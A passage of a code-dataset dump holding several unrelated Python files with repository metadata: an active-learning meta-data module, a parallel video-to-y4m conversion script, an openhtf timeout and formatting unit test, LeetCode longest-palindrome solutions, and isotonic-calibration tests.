saving_path='.'):\n \"\"\"Split given data.\n\n Parameters\n ----------\n test_ratio: float, optional (default=0.3)\n Ratio of test set\n\n initial_label_rate: float, optional (default=0.05)\n Ratio of initial label set\n e.g. Initial_labelset*(1-test_ratio)*n_samples\n\n split_count: int, optional (default=10)\n Random split data _split_count times\n\n saving_path: str, optional (default='.')\n Giving None to disable saving.\n\n Returns\n -------\n train_idx: list\n index of training set, shape like [n_split_count, n_training_indexes]\n\n test_idx: list\n index of testing set, shape like [n_split_count, n_testing_indexes]\n\n label_idx: list\n index of labeling set, shape like [n_split_count, n_labeling_indexes]\n\n unlabel_idx: list\n index of unlabeling set, shape like [n_split_count, n_unlabeling_indexes]\n \"\"\"\n # check parameters\n len_of_parameters = [len(self.X) if self.X is not None else None, len(self.y) if self.y is not None else None]\n number_of_instance = np.unique([i for i in len_of_parameters if i is not None])\n if len(number_of_instance) > 1:\n raise ValueError(\"Different length of instances and _labels found.\")\n else:\n number_of_instance = number_of_instance[0]\n\n instance_indexes = np.arange(number_of_instance)\n\n # split\n train_idx = []\n test_idx = []\n label_idx = []\n unlabel_idx = []\n for i in range(split_count):\n rp = randperm(number_of_instance - 1)\n cutpoint = round((1 - test_ratio) * len(rp))\n tp_train = instance_indexes[rp[0:cutpoint]]\n train_idx.append(tp_train)\n test_idx.append(instance_indexes[rp[cutpoint:]])\n cutpoint = round(initial_label_rate * len(tp_train))\n if cutpoint <= 1:\n cutpoint = 1\n label_idx.append(tp_train[0:cutpoint])\n unlabel_idx.append(tp_train[cutpoint:])\n\n # self.split_save(train_idx=train_idx, test_idx=test_idx, label_idx=label_idx,\n # unlabel_idx=unlabel_idx, path=saving_path)\n return train_idx, test_idx, label_idx, unlabel_idx\n\n def split_load(self, path):\n \"\"\"Load split from path.\n\n 
Parameters\n ----------\n path: str\n Path to a dir which contains train_idx.txt, test_idx.txt, label_idx.txt, unlabel_idx.txt.\n\n Returns\n -------\n train_idx: list\n index of training set, shape like [n_split_count, n_training_samples]\n\n test_idx: list\n index of testing set, shape like [n_split_count, n_testing_samples]\n\n label_idx: list\n index of labeling set, shape like [n_split_count, n_labeling_samples]\n\n unlabel_idx: list\n index of unlabeling set, shape like [n_split_count, n_unlabeling_samples]\n \"\"\"\n if not isinstance(path, str):\n raise TypeError(\"A string is expected, but received: %s\" % str(type(path)))\n saving_path = os.path.abspath(path)\n if not os.path.isdir(saving_path):\n raise Exception(\"A path to a directory is expected.\")\n\n ret_arr = []\n for fname in ['train_idx.txt', 'test_idx.txt', 'label_idx.txt', 'unlabel_idx.txt']:\n if not os.path.exists(os.path.join(saving_path, fname)):\n if os.path.exists(os.path.join(saving_path, fname.split()[0] + '.npy')):\n ret_arr.append(np.load(os.path.join(saving_path, fname.split()[0] + '.npy')))\n else:\n ret_arr.append(None)\n else:\n ret_arr.append(np.loadtxt(os.path.join(saving_path, fname)))\n return ret_arr[0], ret_arr[1], ret_arr[2], ret_arr[3]\n\n def split_save(self, train_idx, test_idx, label_idx, unlabel_idx, path):\n \"\"\"Save the split to file for auditting or loading for other methods.\n\n Parameters\n ----------\n saving_path: str\n path to save the settings. If a dir is not provided, it will generate a folder called\n 'alipy_split' for saving.\n\n \"\"\"\n if path is None:\n return\n else:\n if not isinstance(path, str):\n raise TypeError(\"A string is expected, but received: %s\" % str(type(path)))\n\n saving_path = os.path.abspath(path)\n if os.path.isdir(saving_path):\n np.savetxt(os.path.join(saving_path, self.dataset_name + '_train_idx.txt'), train_idx)\n np.savetxt(os.path.join(saving_path, self.dataset_name + '_test_idx.txt'), test_idx)\n if len(np.shape(label_idx)) == 2:\n np.savetxt(os.path.join(saving_path, self.dataset_name + '_label_idx.txt'), label_idx)\n np.savetxt(os.path.join(saving_path, self.dataset_name + '_unlabel_idx.txt'), unlabel_idx)\n else:\n np.save(os.path.join(saving_path, self.dataset_name + '_label_idx.npy'), label_idx)\n np.save(os.path.join(saving_path, self.dataset_name + '_unlabel_idx.npy'), unlabel_idx)\n else:\n raise Exception(\"A path to a directory is expected.\")\n\n\ndef mate_data(X, y, distance, cluster_center_index, label_indexs, unlabel_indexs, modelPredictions, query_index):\n \"\"\"Calculate the meta data according to the current model,dataset and five rounds before information.\n\n\n Parameters\n ----------\n X: 2D array\n Feature matrix of the whole dataset. It is a reference which will not use additional memory.\n\n y: {list, np.ndarray}\n The true label of the each round of iteration,corresponding to label_indexs.\n \n distance: 2D\n distance[i][j] reprensts the distance between X[i] and X[j].\n\n cluster_center_index: np.ndarray\n The index corresponding to the samples which is the result of cluster in origin data set. 
\n\n label_indexs: {list, np.ndarray} shape=(number_iteration, corresponding_label_index)\n The label indexs of each round of iteration,\n\n unlabel_indexs: {list, np.ndarray} shape=(number_iteration, corresponding_unlabel_index)\n The unlabel indexs of each round of iteration,\n\n modelPredictions: {list, np.ndarray} shape=(number_iteration, corresponding_perdiction)\n\n query_index: {list, np.ndarray}\n The unlabel samples will be queride,and calculate the performance improvement after add to the labelset.\n\n query_index: int\n The unlabel samples will be queride,and calculate the performance improvement after add to the labelset.\n\n Returns\n -------\n metadata: 2D array\n The meta data about the current model and dataset.\n \"\"\"\n if(np.any(cluster_center_index == -1)):\n raise IndexError(\"cluster_center_index is wrong\")\n for i in range(6):\n assert(np.shape(X)[0] == np.shape(modelPredictions[i])[0]) \n if(not isinstance(label_indexs[i], np.ndarray)):\n label_indexs[i] = np.array(label_indexs[i])\n if(not isinstance(unlabel_indexs[i], np.ndarray)):\n unlabel_indexs[i] = np.array(unlabel_indexs[i])\n \n n_samples, n_feature = np.shape(X)\n query_index_size = len(query_index)\n n_feature_data = n_feature * np.ones((query_index_size, 1))\n current_label_size = len(label_indexs[5])\n current_label_y = y[label_indexs[5]]\n current_unlabel_size = len(unlabel_indexs[5])\n current_prediction = modelPredictions[5]\n\n ratio_label_positive = (sum(current_label_y > 0)) / current_label_size\n ratio_label_positive_data = ratio_label_positive * np.ones_like(n_feature_data)\n ratio_label_negative = (sum(current_label_y < 0)) / current_label_size\n ratio_label_negative_data = ratio_label_negative * np.ones_like(n_feature_data)\n\n ratio_unlabel_positive = (sum(current_prediction[unlabel_indexs[5]] > 0)) / current_unlabel_size\n ratio_unlabel_positive_data = ratio_unlabel_positive * np.ones_like(n_feature_data)\n ratio_unlabel_negative = (sum(current_prediction[unlabel_indexs[5]] < 0)) / current_unlabel_size\n ratio_unlabel_negative_data = ratio_unlabel_negative * np.ones_like(n_feature_data)\n\n\n # the same dataset the same cluster centers\n # data_cluster = KMeans(n_clusters=10, random_state=0).fit(X)\n # data_origin_cluster_centers_10 = data_cluster.cluster_centers_\n # closest_distance_data_cluster_centers_10 = np.zeros(10) + np.infty\n # data_cluster_centers_10_index = np.zeros(10, dtype=int) - 1\n\n # # obtain the cluster centers index\n # for i in range(n_samples):\n # for j in range(10):\n # distance = np.linalg.norm(X[i] - data_origin_cluster_centers_10[j])\n # if distance < closest_distance_data_cluster_centers_10[j]:\n # closest_distance_data_cluster_centers_10[j] = distance\n # data_cluster_centers_10_index[j] = i\n\n data_cluster_centers_10 = X[cluster_center_index]\n\n \n sorted_labelperdiction_index = np.argsort(current_prediction[label_indexs[5]])\n sorted_current_label_data = X[label_indexs[5][sorted_labelperdiction_index]]\n \n label_10_equal = [sorted_current_label_data[int(i * current_label_size)] for i in np.arange(0, 1, 0.1)]\n label_10_equal_index = [label_indexs[5][sorted_labelperdiction_index][int(i * current_label_size)] for i in np.arange(0, 1, 0.1)]\n\n sorted_unlabelperdiction_index = np.argsort(current_prediction[unlabel_indexs[5]])\n sorted_current_unlabel_data = X[unlabel_indexs[5][sorted_unlabelperdiction_index]]\n unlabel_10_equal = [sorted_current_unlabel_data[int(i * current_unlabel_size)] for i in np.arange(0, 1, 0.1)]\n unlabel_10_equal_index = 
[unlabel_indexs[5][sorted_unlabelperdiction_index][int(i * current_unlabel_size)] for i in np.arange(0, 1, 0.1)]\n\n \n distance_query_data = None\n cc_sort_index = []\n\n for i in query_index:\n i_cc = []\n i_l10e = []\n i_u10e = []\n for j in range(10):\n # cal the ith in query_index about \n # i_cc.append(np.linalg.norm(X[i] - data_cluster_centers_10[j]))\n # i_l10e.append(np.linalg.norm(X[i] - label_10_equal[j]))\n # i_u10e.append(np.linalg.norm(X[i] - unlabel_10_equal[j]))\n i_cc.append(distance[i][cluster_center_index[j]])\n i_l10e.append(distance[i][label_10_equal_index[j]])\n i_u10e.append(distance[i][unlabel_10_equal_index[j]])\n\n i_cc = minmax_scale(i_cc)\n i_cc_sort_index = np.argsort(i_cc)\n cc_sort_index.append(i_cc_sort_index)\n i_l10e = minmax_scale(i_l10e)\n i_u10e = minmax_scale(i_u10e)\n i_distance = np.hstack((i_cc[i_cc_sort_index], i_l10e, i_u10e))\n if distance_query_data is None:\n distance_query_data = i_distance\n else:\n distance_query_data = np.vstack((distance_query_data, i_distance))\n\n ratio_tn = []\n ratio_fp = []\n ratio_fn = []\n ratio_tp = []\n label_pre_10_equal = []\n labelmean = []\n labelstd = []\n unlabel_pre_10_equal = []\n round5_ratio_unlabel_positive = []\n round5_ratio_unlabel_negative = []\n unlabelmean = []\n unlabelstd = [] \n for i in range(6):\n label_size = len(label_indexs[i])\n unlabel_size = len(unlabel_indexs[i])\n # cur_prediction = modelPredictions[i]\n cur_prediction = np.array([1 if k>0 else -1 for k in modelPredictions[i]])\n label_ind = label_indexs[i]\n unlabel_ind = unlabel_indexs[i]\n\n tn, fp, fn, tp = confusion_matrix(y[label_ind], cur_prediction[label_ind], labels=[-1, 1]).ravel()\n ratio_tn.append(tn / label_size)\n ratio_fp.append(fp / label_size)\n ratio_fn.append(fn / label_size)\n ratio_tp.append(tp / label_size)\n\n sort_label_pred = np.sort(minmax_scale(cur_prediction[label_ind]))\n i_label_10_equal = [sort_label_pred[int(i * label_size)] for i in np.arange(0, 1, 0.1)]\n label_pre_10_equal = np.r_[label_pre_10_equal, i_label_10_equal]\n labelmean.append(np.mean(i_label_10_equal))\n labelstd.append(np.std(i_label_10_equal))\n\n round5_ratio_unlabel_positive.append((sum(current_prediction[unlabel_ind] > 0)) / unlabel_size)\n round5_ratio_unlabel_negative.append((sum(current_prediction[unlabel_ind] < 0)) / unlabel_size)\n sort_unlabel_pred = np.sort(minmax_scale(cur_prediction[unlabel_ind]))\n i_unlabel_10_equal = [sort_unlabel_pred[int(i * unlabel_size)] for i in np.arange(0, 1, 0.1)]\n unlabel_pre_10_equal = np.r_[unlabel_pre_10_equal, i_unlabel_10_equal]\n unlabelmean.append(np.mean(i_unlabel_10_equal))\n unlabelstd.append(np.std(i_unlabel_10_equal))\n model_infor = np.hstack((ratio_tp, ratio_fp, ratio_tn, ratio_fn, label_pre_10_equal, labelmean, labelstd, \\\n round5_ratio_unlabel_positive, round5_ratio_unlabel_negative, unlabel_pre_10_equal, unlabelmean, unlabelstd))\n model_infor_data = model_infor * np.ones_like(n_feature_data)\n\n fx_data = None\n k = 0\n for i in query_index:\n f_x_a = []\n # f_x_b = []\n f_x_c = []\n f_x_d = []\n # print('data_cluster_centers_10_index[cc_sort_index[k]]', data_cluster_centers_10_index[cc_sort_index[k]])\n for round in range(6):\n predict = minmax_scale(modelPredictions[round])\n for j in range(10):\n f_x_a.append(predict[i] - predict[cluster_center_index[cc_sort_index[k][j]]])\n for j in range(10):\n f_x_c.append(predict[i] - predict[label_10_equal_index[j]])\n for j in range(10):\n f_x_d.append(predict[i] - predict[unlabel_10_equal_index[j]])\n fdata = 
np.hstack((current_prediction[i], f_x_a, f_x_c, f_x_d))\n if fx_data is None:\n fx_data = fdata\n else:\n fx_data = np.vstack((fx_data, fdata))\n k += 1\n\n metadata = np.hstack((n_feature_data, ratio_label_positive_data, ratio_label_negative_data, \\\n ratio_unlabel_positive_data, ratio_unlabel_negative_data, distance_query_data, model_infor_data, fx_data))\n print('The shape of meta_data: ', np.shape(metadata))\n return metadata\n\ndef mate_data_1(X, y, distance, cluster_center_index, label_indexs, unlabel_indexs, modelOutput, query_index):\n \"\"\"Calculate the meta data according to the current model,dataset and five rounds before information.\n\n\n Parameters\n ----------\n X: 2D array\n Feature matrix of the whole dataset. It is a reference which will not use additional memory.\n\n y: {list, np.ndarray}\n The true label of the each round of iteration,corresponding to label_indexs.\n \n distance: 2D\n distance[i][j] reprensts the distance between X[i] and X[j].\n\n cluster_center_index: np.ndarray\n The index corresponding to the samples which is the result of cluster in origin data set. \n\n label_indexs: {list, np.ndarray} shape=(number_iteration, corresponding_label_index)\n The label indexs of each round of iteration,\n\n unlabel_indexs: {list, np.ndarray} shape=(number_iteration, corresponding_unlabel_index)\n The unlabel indexs of each round of iteration,\n\n modelOutput: {list, np.ndarray} shape=(number_iteration, corresponding_perdiction)\n\n query_index: int\n The unlabel sample will be queride,and calculate the performance improvement after add to the labelset.\n \n Returns\n -------\n metadata: 1d-array\n The meta data about the current model and dataset.\n \"\"\"\n if(np.any(cluster_center_index == -1)):\n raise IndexError(\"cluster_center_index is wrong\")\n for i in range(5):\n assert(np.shape(X)[0] == np.shape(modelOutput[i])[0]) \n if(not isinstance(label_indexs[i], np.ndarray)):\n label_indexs[i] = np.array(label_indexs[i])\n if(not isinstance(unlabel_indexs[i], np.ndarray)):\n unlabel_indexs[i] = np.array(unlabel_indexs[i])\n \n n_samples, n_feature = np.shape(X)\n\n current_label_size = len(label_indexs[5])\n current_label_y = y[label_indexs[5]]\n current_unlabel_size = len(unlabel_indexs[5])\n current_prediction = modelOutput[5]\n\n ratio_label_positive = (sum(current_label_y > 0)) / current_label_size\n ratio_label_negative = (sum(current_label_y < 0)) / current_label_size\n\n ratio_unlabel_positive = (sum(current_prediction[unlabel_indexs[5]] > 0)) / current_unlabel_size\n ratio_unlabel_negative = (sum(current_prediction[unlabel_indexs[5]] < 0)) / current_unlabel_size\n\n sorted_labelperdiction_index = np.argsort(current_prediction[label_indexs[5]])\n sorted_current_label_data = X[label_indexs[5][sorted_labelperdiction_index]]\n \n label_10_equal_index = [label_indexs[5][sorted_labelperdiction_index][int(i * current_label_size)] for i in np.arange(0, 1, 0.1)]\n\n sorted_unlabelperdiction_index = np.argsort(current_prediction[unlabel_indexs[5]])\n sorted_current_unlabel_data = X[unlabel_indexs[5][sorted_unlabelperdiction_index]]\n unlabel_10_equal_index = [unlabel_indexs[5][sorted_unlabelperdiction_index][int(i * current_unlabel_size)] for i in np.arange(0, 1, 0.1)]\n \n cc = []\n l10e = []\n u10e = []\n for j in range(10):\n cc.append(distance[query_index][cluster_center_index[j]])\n l10e.append(distance[query_index][label_10_equal_index[j]])\n u10e.append(distance[query_index][unlabel_10_equal_index[j]])\n\n cc = minmax_scale(cc)\n cc_sort_index = 
np.argsort(cc)\n l10e = minmax_scale(l10e)\n u10e = minmax_scale(u10e)\n distance_query_data = np.hstack((cc[cc_sort_index], l10e, u10e))\n\n ratio_tn = []\n ratio_fp = []\n ratio_fn = []\n ratio_tp = []\n label_pre_10_equal = []\n labelmean = []\n labelstd = []\n unlabel_pre_10_equal = []\n round5_ratio_unlabel_positive = []\n round5_ratio_unlabel_negative = []\n unlabelmean = []\n unlabelstd = [] \n for i in range(6):\n label_size = len(label_indexs[i])\n unlabel_size = len(unlabel_indexs[i])\n # cur_prediction = modelOutput[i]\n cur_prediction = np.array([1 if k>0 else -1 for k in modelOutput[i]])\n label_ind = label_indexs[i]\n unlabel_ind = unlabel_indexs[i]\n\n tn, fp, fn, tp = confusion_matrix(y[label_ind], cur_prediction[label_ind], labels=[-1, 1]).ravel()\n ratio_tn.append(tn / label_size)\n ratio_fp.append(fp / label_size)\n ratio_fn.append(fn / label_size)\n ratio_tp.append(tp / label_size)\n\n sort_label_pred = np.sort(minmax_scale(modelOutput[i][label_ind]))\n i_label_10_equal = [sort_label_pred[int(i * label_size)] for i in np.arange(0, 1, 0.1)]\n label_pre_10_equal = np.r_[label_pre_10_equal, i_label_10_equal]\n labelmean.append(np.mean(i_label_10_equal))\n labelstd.append(np.std(i_label_10_equal))\n\n round5_ratio_unlabel_positive.append((sum(current_prediction[unlabel_ind] > 0)) / unlabel_size)\n round5_ratio_unlabel_negative.append((sum(current_prediction[unlabel_ind] < 0)) / unlabel_size)\n sort_unlabel_pred = np.sort(minmax_scale(modelOutput[i][unlabel_ind]))\n i_unlabel_10_equal = [sort_unlabel_pred[int(i * unlabel_size)] for i in np.arange(0, 1, 0.1)]\n unlabel_pre_10_equal = np.r_[unlabel_pre_10_equal, i_unlabel_10_equal]\n unlabelmean.append(np.mean(i_unlabel_10_equal))\n unlabelstd.append(np.std(i_unlabel_10_equal))\n model_infor = np.hstack((ratio_tp, ratio_fp, ratio_tn, ratio_fn, label_pre_10_equal, labelmean, labelstd, \\\n round5_ratio_unlabel_positive, round5_ratio_unlabel_negative, unlabel_pre_10_equal, unlabelmean, unlabelstd))\n\n f_x_a = []\n f_x_c = []\n f_x_d = []\n for round in range(6):\n model_output = minmax_scale(modelOutput[round])\n for j in range(10):\n f_x_a.append(model_output[query_index] - model_output[cluster_center_index[cc_sort_index[j]]])\n for j in range(10):\n f_x_c.append(model_output[query_index] - model_output[label_10_equal_index[j]])\n for j in range(10):\n f_x_d.append(model_output[query_index] - model_output[unlabel_10_equal_index[j]])\n fdata = np.hstack((current_prediction[query_index], f_x_a, f_x_c, f_x_d))\n\n metadata = np.hstack((n_feature, ratio_label_positive, ratio_label_negative, \\\n ratio_unlabel_positive, ratio_unlabel_negative, distance_query_data, model_infor, fdata))\n return metadata\n\ndef model_select(modelname):\n \"\"\"\n Parameters\n ----------\n modelname: str\n The name of model.\n 'KNN', 'LR', 'RFC', 'RFR', 'DTC', 'DTR', 'SVM', 'GBDT'\n\n Returns\n -------\n model: sklearn model\n The model in sklearn with corresponding parameters.\n \"\"\"\n\n if modelname not in ['KNN', 'LR', 'RFC', 'RFR', 'DTC', 'DTR', 'SVM', 'GBDT']:\n raise ValueError(\"There is no \" + modelname)\n\n if modelname == 'KNN':\n from sklearn.neighbors import KNeighborsClassifier \n models = []\n n_neighbors_parameter = [5, 8, 11, 14, 17, 20]\n algorithm_parameter = ['auto', 'ball_tree', 'kd_tree', 'brute']\n leaf_size_parameter = [20, 25, 30, 35, 40, 45, 50]\n p_parameter = [1, 2, 3]\n for n in n_neighbors_parameter:\n for a in algorithm_parameter:\n for l in leaf_size_parameter:\n for p in p_parameter:\n 
models.append(KNeighborsClassifier(n_neighbors=n, algorithm=a, leaf_size=l, p=p))\n return models \n\n if modelname == 'LR':\n from sklearn.linear_model import LogisticRegression\n models = []\n # penalty_parameter = ['l1', 'l2']\n C_parameter = [1e-2, 1e-1, 0.5, 1, 1.5]\n tol_parameter = [1e-5, 1e-4, 1e-3]\n solver_parameter = ['newton-cg', 'lbfgs', 'liblinear', 'sag', 'saga']\n max_iter_parameter = [50, 100, 150, 200]\n for c in C_parameter:\n for t in tol_parameter:\n for s in solver_parameter:\n for m in max_iter_parameter:\n models.append(LogisticRegression(C=c, tol=t, solver=s, max_iter=m))\n return models\n\n if modelname == 'RFC':\n from sklearn.ensemble import RandomForestClassifier\n models = []\n n_estimators_parameter = [10, 40, 70, 110, 150, 200, 250, 300]\n max_features_parameter = ['auto', 'sqrt', 'log2', None]\n for n in n_estimators_parameter:\n for m in max_features_parameter:\n models.append(RandomForestClassifier(n_estimators=n, max_features=m))\n return models\n \n if modelname == 'RFR':\n from sklearn.ensemble import RandomForestRegressor\n models = []\n n_estimators_parameter = [10, 40, 70, 110, 150, 200, 250, 300]\n max_features_parameter = ['auto', 'sqrt', 'log2', None]\n for n in n_estimators_parameter:\n for m in max_features_parameter:\n models.append(RandomForestRegressor(n_estimators=n, max_features=m))\n return models\n \n if modelname == 'DTC':\n from sklearn.tree import DecisionTreeClassifier\n models = []\n splitter_parameter = ['best', 'random']\n max_features_parameter = ['auto', 'sqrt', 'log2', None]\n for s in splitter_parameter:\n for m in max_features_parameter:\n models.append(DecisionTreeClassifier(splitter=s, max_features=m))\n return models\n\n if modelname == 'DTR':\n from sklearn.tree import DecisionTreeRegressor\n models = []\n splitter_parameter = ['best', 'random']\n max_features_parameter = ['auto', 'sqrt', 'log2', None]\n for s in splitter_parameter:\n for m in max_features_parameter:\n models.append(DecisionTreeRegressor(splitter=s, max_features=m))\n return models \n\n if modelname == 'SVM':\n from sklearn.svm import SVC\n models = []\n C_parameter = [1e-2, 1e-1, 0.5, 1, 1.5]\n kernel_parameter = ['linear', 'poly', 'rbf', 'sigmoid']\n degree_parameter = [2, 3, 4, 5]\n tol_parameter = [1e-5, 1e-4, 1e-3]\n for c in C_parameter:\n for k in kernel_parameter:\n for d in degree_parameter:\n for t in tol_parameter:\n models.append(SVC(C=c ,kernel=k, degree=d, tol=t, probability=True))\n return models\n\n\n if modelname == 'GBDT':\n from sklearn.ensemble import GradientBoostingClassifier\n models = []\n loss_parameter = ['deviance', 'exponential']\n learning_rate_parameter = [0.02, 0.05, 0.1, 0.15]\n n_estimators_parameter = [40, 70, 110, 150, 200, 250, 300]\n max_depth_parameter = [2, 3, 5]\n max_features_parameter = ['auto', 'sqrt', 'log2', None]\n for l in loss_parameter:\n for le in learning_rate_parameter:\n for n in n_estimators_parameter:\n for md in max_depth_parameter:\n for mf in max_features_parameter:\n models.append(GradientBoostingClassifier(loss=l, learning_rate=le, n_estimators=n, max_depth=md, max_features=mf))\n return models \n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n\n\n X, y = make_classification(n_samples=1000, n_features=5, n_classes=2)\n y[y==0] = -1\n d = DataSet(X=X, y=y, dataset_name='test')\n cd, cdi = d.get_cluster_center()\n distance = d.get_distance()\n\n train, test, l_ind, u_ind = d.split_data(split_count=6)\n\n # print(np.shape(train))\n # print(np.shape(l_ind))\n\n # print(np.shape(u_ind))\n # 
print(l_ind[5])\n \n models = []\n decision_value = []\n prediction = []\n\n # model = SVC(probability=True)\n # model.fit(X[l_ind[0]], y[l_ind[0]])\n\n # pre = model.predict_proba(X)\n # print(np.shape(pre))\n # print(np.shape(pre[:, 1]))\n # de = model.decision_function(X)\n # print(np.shape(de))\n # print(pre[0:5, 1])\n # print(pre[0:5, 0])\n # print(de[0:5])\n \n # print(np.shape(de[:, 1]))\n\n for i in range(6):\n model = SVC()\n model.fit(X[l_ind[i]], y[l_ind[i]])\n # prediction.append(model.predict_proba(X)[:, 1])\n decision_value.append(model.decision_function(X))\n models.append(model)\n \n query_index = [30]\n query_index = np.array(query_index)\n meta = mate_data_1(X, y, distance, cdi, l_ind, u_ind, decision_value, 50)\n","repo_name":"Lggggggx/baseline","sub_path":"LAL/baseline/meta_data.py","file_name":"meta_data.py","file_ext":"py","file_size_in_byte":32114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17976806724","text":"import pandas as pd\nfrom joblib import Parallel,delayed\nimport subprocess\nimport os\nimport glob\n\n\n\nfilenames = glob.glob(os.path.join('/data/PV_VQA_Study/all_cut_upscaled_hfr_motioninterpolated_yuv_vids/','*'))\nprint(filenames)\ndef run_ffmpeg(filenames,i):\n input_vid = filenames[i]\n out_mp4_vid = os.path.join('/data/PV_VQA_Study/all_cut_upscaled_hfr_motioninterpolated_y4m_vids',os.path.splitext(os.path.basename(input_vid))[0]+'.y4m')\n if(os.path.exists(out_mp4_vid)):\n return\n command = ['./cvt2y4m.sh',input_vid,out_mp4_vid,fps,w,h]\n print(command)\n os.system(' '.join(command))\n return\n\n\nParallel(n_jobs=32)(delayed(run_ffmpeg)(filenames,i) for i in range(len(filenames)))\n#for i in range(len(filenames)):\n# run_ffmpeg(filenames,i)\n","repo_name":"JoshuaEbenezer/lbmfr-public","sub_path":"data_gen_code/cvt_all_y4m2yuv.py","file_name":"cvt_all_y4m2yuv.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"21097586019","text":"import copy\nimport time\nimport unittest\nfrom unittest import mock\n\nfrom openhtf import util\nfrom openhtf.util import timeouts\n\n\nclass TestUtil(unittest.TestCase):\n\n def setUp(self):\n super(TestUtil, self).setUp()\n self.timeout = 60\n self.polledtimeout = timeouts.PolledTimeout(self.timeout)\n\n @mock.patch.object(time, 'time')\n def test_time_expired_false(self, mock_time):\n elapsed = 3\n mock_time.side_effect = [1, 1 + elapsed, 2 + elapsed]\n\n self.polledtimeout.restart()\n sec = self.polledtimeout.seconds\n self.assertLessEqual(sec, self.timeout - elapsed)\n self.assertFalse(self.polledtimeout.has_expired())\n\n def test_time_expired_true(self):\n self.polledtimeout.expire()\n self.assertTrue(self.polledtimeout.has_expired())\n\n def test_partial_format(self):\n original = ('Apples are {apple[color]} and {apple[taste]}. '\n 'Pears are {pear.color} and {pear.taste}. '\n 'Oranges are {orange_color} and {orange_taste}.')\n text = copy.copy(original)\n\n apple = {\n 'color': 'red',\n 'taste': 'sweet',\n }\n\n class Pear(object):\n color = 'green'\n taste = 'tart'\n\n pear = Pear()\n\n # Partial formatting\n res = util.partial_format(text, apple=apple)\n res = util.partial_format(res, pear=pear)\n self.assertEqual(\n 'Apples are red and sweet. Pears are green and tart. 
'\n 'Oranges are {orange_color} and {orange_taste}.', res)\n\n # Format rest of string\n res = util.partial_format(res, orange_color='orange', orange_taste='sour')\n self.assertEqual(\n 'Apples are red and sweet. Pears are green and tart. '\n 'Oranges are orange and sour.', res)\n\n # The original text has not changed\n self.assertEqual(original, text)\n\n # Make sure no unexpected problems with an empty string\n empty_string = ''\n self.assertEqual('', util.partial_format(empty_string))\n self.assertEqual('', util.partial_format(empty_string, foo='bar'))\n","repo_name":"google/openhtf","sub_path":"test/util/util_test.py","file_name":"util_test.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":454,"dataset":"github-code","pt":"81"} +{"seq_id":"39603462535","text":"class Solution:\n def longestPalindrome(self, s: str) -> str:\n T = '#'.join('@{}%'.format(s))\n n, C, R = len(T), 0, 0\n P = [0] * n\n for i in range(1, n - 1):\n P[i] = min(R - i, P[C - (i - C)]) if R > i else 0\n while T[i + 1 + P[i]] == T[i - 1 - P[i]]:\n P[i] += 1\n if i + P[i] > R:\n C, R = i, i + P[i]\n maxLen, center = 0, 0\n for i, p in enumerate(P):\n if p > maxLen:\n maxLen, center = p, i\n return s[(center - maxLen) // 2 : (center + maxLen) // 2]\n\n\nclass Solution(object):\n def longestPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n if len(s) <= 1:\n return s\n maxLen = 1\n head = 0\n for i in xrange(len(s)):\n if i - maxLen >= 1 and s[i-maxLen-1:i+1] == s[i-maxLen-1:i+1][::-1]:\n head = i - maxLen - 1\n maxLen += 2\n continue\n if i - maxLen >= 0 and s[i-maxLen:i+1] == s[i-maxLen:i+1][::-1]:\n head = i - maxLen\n maxLen += 1\n return s[head:head + maxLen]\n\nclass Solution:\n def longestPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n res = ''\n n = len(s)\n dp = [[False for cols in range(n)] for rows in range(n)]\n for i in range(n - 1, -1, -1):\n for j in range(i, n):\n dp[i][j] = s[i] == s[j] and (j - i < 3 or dp[i + 1][j - 1])\n if dp[i][j] and j - i + 1 > len(res):\n res = s[i:j + 1]\n return res\n","repo_name":"allenhyp/LeetCodePractice","sub_path":"005_Longest_Palindromic_Substring.py","file_name":"005_Longest_Palindromic_Substring.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25352657","text":"import pandas as pd\n\nfrom model import *\nfrom old.isocal import *\nfrom scores import *\n\n\ndef measure_tests():\n a = pd.Series([0.9, 0.7, 0.1, 0.2])\n b = pd.Series([1, 0, 0, 1])\n df = pd.DataFrame({\"score\": a, \"cl\": b})\n assert accuracy(df) == 0.5\n assert roc_auc(df) == 0.75\n assert bs(df) == 0.2875\n assert round(logloss(df), 4) == 0.7560\n\n\ndef isocal_test2():\n scores = [0, 0, 0, 0, 0, 0, 0, 0.5, 0.5, 1, 1, 1, 1]\n classes = [0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1]\n ic = IsotonicCalibration(None)\n cal_pairs = ic.fit_isotonic_regression(scores, classes)\n ic.cal_model = ic.isotonic_regression_model(cal_pairs)\n for p in cal_pairs:\n print(p.sc, p.csc, p.fsc, p.cl, ic.predict(p.sc))\n\ndef isocal_test():\n scores = [2.7, 0.5, 1.2, 2.2, 0.7, 0.3]\n classes = [1, 1, 0, 1, 0, 0]\n ic = IsotonicCalibration(None)\n cal_pairs = ic.fit_isotonic_regression(scores, classes)\n model = ic.isotonic_regression_model(cal_pairs)\n ic.cal_model = model\n res = ic.predict(2)\n for i in [0, 0.4, 0.8, 1.2, 1.6, 2.0, 2.4]:\n print(ic.predict(i))\n assert round(res, 2) == round(13/15, 2)\n\n\ndef isocal_test3():\n 
